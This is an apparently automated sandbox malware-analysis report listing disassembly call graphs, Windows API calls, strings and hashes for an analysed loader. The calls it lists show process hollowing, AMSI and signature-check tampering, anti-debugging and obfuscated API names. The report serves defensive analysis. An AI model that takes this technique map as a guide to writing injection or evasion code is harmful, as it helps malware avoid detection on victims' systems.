                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005FC,00000000,000005FC,0282B420,ScanBuffer,0282B3A4,027EA7F4,ScanString,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,000008AC,00203FF8,0282B4F8), ref: 027EA1DC
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                        • API String ID: 4083799063-51457883
                                                                                        • Opcode ID: 3d4b60e071a62e065c0e39399744be5a44f9edddfdb193ccf66416e22ef8ab30
                                                                                        • Instruction ID: 66f1110e47c72c8bd53e8730a751647debf5190d21488ec845ae315226cac4ff
                                                                                        • Opcode Fuzzy Hash: 3d4b60e071a62e065c0e39399744be5a44f9edddfdb193ccf66416e22ef8ab30
                                                                                        • Instruction Fuzzy Hash: 76E21579A4015A9FDF12EB54DDA6BCE73B6EF89300F1041B1900AAB214DF34AE95CF61

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 6883 27e8c26-27e8c2b 6885 27e8c30-27e8c35 6883->6885 6885->6885 6886 27e8c37-27e8d1e call 27d4990 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6885->6886 6917 27ea76f-27ea7d9 call 27d4500 * 2 call 27d4c60 call 27d4500 call 27d44dc call 27d4500 * 2 6886->6917 6918 27e8d24-27e8dff call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6886->6918 6918->6917 6962 27e8e05-27e912d call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d30d4 * 2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 call 27d4df0 call 27e8654 6918->6962 7071 27e912f-27e919b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6962->7071 7072 27e91a0-27e94c1 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2ee0 call 27d2f08 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 
27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c GetThreadContext 6962->7072 7071->7072 7072->6917 7180 27e94c7-27e972a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e82cc 7072->7180 7253 27e9a37-27e9aa3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 7180->7253 7254 27e9730-27e9899 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e853c 7180->7254 7281 27e9aa8-27e9c28 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 7253->7281 7344 27e989b-27e98c1 call 27e7a2c 7254->7344 7345 27e98c3-27e992f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 7254->7345 7281->6917 7385 27e9c2e-27e9d27 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8b38 7281->7385 7354 27e9934-27e9a35 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 
27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 7344->7354 7345->7354 7354->7281 7436 27e9d7b-27ea76a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c SetThreadContext NtResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2c2c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8818 * 3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8818 * 2 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 * 5 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 
27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27e7f4c call 27e8818 * 2 7385->7436 7437 27e9d29-27e9d76 call 27e8a30 call 27e8a24 7385->7437 7436->6917 7437->7436
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027E8654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                        • GetThreadContext.KERNEL32(000005FC,0282B420,ScanString,0282B3A4,027EA7F4,UacInitialize,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,UacInitialize,0282B3A4), ref: 027E94BA
                                                                                          • Part of subcall function 027E82CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E833D
                                                                                          • Part of subcall function 027E853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 027E85A1
                                                                                          • Part of subcall function 027E7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                        • API String ID: 2852987580-51457883
                                                                                        • Opcode ID: 28a0bedc08dccbced71c839fff1e0508311ac76d2050338cd47246e38124c94f
                                                                                        • Instruction ID: 1312af9b2698ad8161b6048d725db8b9b4ac71924c21cdcbd83a423c78213167
                                                                                        • Opcode Fuzzy Hash: 28a0bedc08dccbced71c839fff1e0508311ac76d2050338cd47246e38124c94f
                                                                                        • Instruction Fuzzy Hash: 5FE22679A4015A9FDF12EB54DDA6BCE73B6EF89300F1041B19006AB214DF34AE95CF61

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 10910 27d5acc-27d5b0d GetModuleFileNameA RegOpenKeyExA 10911 27d5b4f-27d5b92 call 27d5908 RegQueryValueExA 10910->10911 10912 27d5b0f-27d5b2b RegOpenKeyExA 10910->10912 10917 27d5b94-27d5bb0 RegQueryValueExA 10911->10917 10918 27d5bb6-27d5bd0 RegCloseKey 10911->10918 10912->10911 10913 27d5b2d-27d5b49 RegOpenKeyExA 10912->10913 10913->10911 10915 27d5bd8-27d5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10913->10915 10919 27d5c0f-27d5c13 10915->10919 10920 27d5cf2-27d5cf9 10915->10920 10917->10918 10923 27d5bb2 10917->10923 10921 27d5c1f-27d5c35 lstrlenA 10919->10921 10922 27d5c15-27d5c19 10919->10922 10925 27d5c38-27d5c3b 10921->10925 10922->10920 10922->10921 10923->10918 10926 27d5c3d-27d5c45 10925->10926 10927 27d5c47-27d5c4f 10925->10927 10926->10927 10928 27d5c37 10926->10928 10927->10920 10929 27d5c55-27d5c5a 10927->10929 10928->10925 10930 27d5c5c-27d5c82 lstrcpynA LoadLibraryExA 10929->10930 10931 27d5c84-27d5c86 10929->10931 10930->10931 10931->10920 10932 27d5c88-27d5c8c 10931->10932 10932->10920 10933 27d5c8e-27d5cbe lstrcpynA LoadLibraryExA 10932->10933 10933->10920 10934 27d5cc0-27d5cf0 lstrcpynA LoadLibraryExA 10933->10934 10934->10920
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,027D0000,027FE790), ref: 027D5AE8
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B06
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B24
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D5B42
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D5B8B
                                                                                        • RegQueryValueExA.ADVAPI32(?,027D5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001), ref: 027D5BA9
                                                                                        • RegCloseKey.ADVAPI32(?,027D5BD8,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D5BCB
                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5BE8
                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5BF5
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D5BFB
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D5C26
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5C6D
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5C7D
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5CA5
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5CB5
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D5CDB
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027D5CEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                        • API String ID: 1759228003-2375825460
                                                                                        • Opcode ID: c15b65bbb57e2048f6aac8f9631125bf8ec6fbfcbed6e6023d86286100594794
                                                                                        • Instruction ID: c3e34a489db54c63baf7ecf738aacb9ebbe7e4affb00c43f8dd7247ee2ff1574
                                                                                        • Opcode Fuzzy Hash: c15b65bbb57e2048f6aac8f9631125bf8ec6fbfcbed6e6023d86286100594794
                                                                                        • Instruction Fuzzy Hash: CF519871B4025D7FFB21D6E4CC4AFEF7BBD9B04744F8405A5AA08E6181EB74AA448F60

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                        • API String ID: 1002360270-4067648912
                                                                                        • Opcode ID: e9ea02c49ae79e6b2992b1c7d5c55d7c71101612f354684ff2446c09383ec4f6
                                                                                        • Instruction ID: 54ab804027e6dde41dc6509da60e52d95f769a0d406903936d146255e1549cc3
                                                                                        • Opcode Fuzzy Hash: e9ea02c49ae79e6b2992b1c7d5c55d7c71101612f354684ff2446c09383ec4f6
                                                                                        • Instruction Fuzzy Hash: CFF02278E83B045EE730A668BA4DF2633ECE34831CF0D492AB008C72C0C3715868CB20

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 027EFA48
                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027EFA5A
                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027EFA71
                                                                                        Similarity
                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                        • API String ID: 35162468-539270669
                                                                                        • Opcode ID: 6e73c6a7356adabe1b05a47272d314494303615280b6980f8aeb5b3a3e913383
                                                                                        • Instruction ID: f502e16f56deb7b1708dcc704458b4d7919f871a7f4bf0ed3aea86abe9b94101
                                                                                        • Opcode Fuzzy Hash: 6e73c6a7356adabe1b05a47272d314494303615280b6980f8aeb5b3a3e913383
                                                                                        • Instruction Fuzzy Hash: 4FF0A770904248AADF11A6F8C88CB9CFBB95B0A328F2403D1D4266A9E1E7711644C6AA

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 027D4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 027D4F2E
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE09F
                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE0CF
                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027EE0E4
                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027EE110
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027EE119
                                                                                          • Part of subcall function 027D4C60: SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        Similarity
                                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 1897104825-0
                                                                                        • Opcode ID: c9f02ad11066dca1ca7883b16efee9dd6844e816fc62fd9c7e9ad4cb14b9efd3
                                                                                        • Instruction ID: 15349d44fa63ee430261b5859b0d74645901ad0ee560e901ba101f2844e6d1a5
                                                                                        • Opcode Fuzzy Hash: c9f02ad11066dca1ca7883b16efee9dd6844e816fc62fd9c7e9ad4cb14b9efd3
                                                                                        • Instruction Fuzzy Hash: 9821D371A40308BBEB11EAE4CC56FDE77BDEB48700F510461F601F71D0DA74AA448B65

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027EE8EA
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        • Opcode ID: aeb2b10d1a7a94b2d85ea304b88195d8e0f12451ffec76df6f4ba717de231d6b
                                                                                        • Instruction ID: 7501c609f0c005200415d19c0c11af21389de49fab16e30db7648db2542d3896
                                                                                        • Opcode Fuzzy Hash: aeb2b10d1a7a94b2d85ea304b88195d8e0f12451ffec76df6f4ba717de231d6b
                                                                                        • Instruction Fuzzy Hash: 0B414E75F102499BEF02EBA4D895ADEB7FAEF9C710F604831E042A7250DA70AD018F61
                                                                                        APIs
                                                                                          • Part of subcall function 027D4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 027D4F2E
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE052), ref: 027EDFBF
                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027EDFF9
                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027EE026
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027EE02F
                                                                                        Similarity
                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3764614163-0
                                                                                        • Opcode ID: a9fbb95e86c329e08604a17b7ffdb07f6b97c2a03a5cc7b26cbc4b1fb362d745
                                                                                        • Instruction ID: 0062d2f6150ccd3f3326e29fb5bfef8bba4f686b4ff5acf5c4cfcc379a9e9d65
                                                                                        • Opcode Fuzzy Hash: a9fbb95e86c329e08604a17b7ffdb07f6b97c2a03a5cc7b26cbc4b1fb362d745
                                                                                        • Instruction Fuzzy Hash: 0921F171A40248BAEF21EBA4CD56F9E77BDEB08B00F614461B601F71D0D7B46E048B65
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                                        • API String ID: 3130163322-2353454454
                                                                                        • Opcode ID: 126979a35ec61358ed0ee4449c57685d8fbb724a7b9f364e8cb7e7b790897144
                                                                                        • Instruction ID: f654ab361b02969438039ce0dc079ec3956848ab5323b0bbd4a7d0453bc4aa56
                                                                                        • Opcode Fuzzy Hash: 126979a35ec61358ed0ee4449c57685d8fbb724a7b9f364e8cb7e7b790897144
                                                                                        • Instruction Fuzzy Hash: 481112B6640208BFEB81EFA8DE46F9A37EDEB0C714F464420BA09D3650C630ED108B75
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                        • API String ID: 4072585319-445027087
                                                                                        • Opcode ID: 4aa6e6e9700a1fb5ae6fc02a2ea1ad8e175e43bbebe4026d7624ebc037995988
